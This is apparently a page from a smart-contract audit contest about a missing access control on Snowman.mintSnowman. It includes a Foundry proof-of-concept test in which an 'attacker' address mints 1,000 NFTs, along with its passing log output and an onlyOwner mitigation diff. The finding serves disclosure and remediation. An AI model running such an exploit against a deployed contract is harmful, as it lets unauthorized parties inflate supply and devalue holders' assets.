`Snowman.mintSnowman` has no access control — anyone can mint unlimited NFTs to any address
Root + Impact
Description
The protocol intends that Snowman NFTs are minted exclusively when a whitelisted user stakes their Snow tokens through SnowmanAirdrop.claimSnowman, which enforces Merkle proof verification, EIP-712 signature validation, and Snow-token staking.
However, Snowman.mintSnowman is declared external with no modifier of any kind, meaning any Externally Owned Account (EOA) or contract can call it with any receiver and any amount, completely bypassing every security check in SnowmanAirdrop.
Risk
Likelihood:
-
This vulnerability is exploitable from the moment the contract is deployed, as `Snowman.mintSnowman` is publicly accessible.
-
No special conditions, permissions, or technical knowledge are required to execute the attack.
-
The declared but unused `SM__NotAllowed()` error in the same contract confirms a guard was intended but never implemented.
Impact:
-
Unlimited Snowman NFTs can be minted to any address, completely inflating NFT supply.
-
The entire protocol invariant — that Snowman NFTs are earned only by staking Snow tokens — is broken and the
SnowmanAirdropcontract's security mechanisms become worthless.
Proof of Concept
The test deploys a fresh Snowman contract and demonstrates that a completely unprivileged address can call mintSnowman directly without holding any Snow tokens or interacting with the airdrop contract. The attacker mints 1,000 NFTs to themselves in a single call, then mints 500 more to a victim address. The assertions confirm both operations succeed unconditionally — the attacker accumulates 1,000 tokens, the victim receives 500, and the token counter reaches 1,500 — all with no whitelist check, Merkle proof, signature, or Snow token requirement of any kind.
To run: forge test --match-test test_anyoneCanMintUnlimitedNFTs -vvvv
Recommended Mitigation
Restrict mintSnowman so only the trusted SnowmanAirdrop contract can call it. Set the airdrop address at deployment time as immutable:
Lead Judging Commences
[H-01] Unrestricted NFT Minting in Snowman.sol
# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Judging
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsRewards Distribution
The contest is complete and the rewards are being distributed.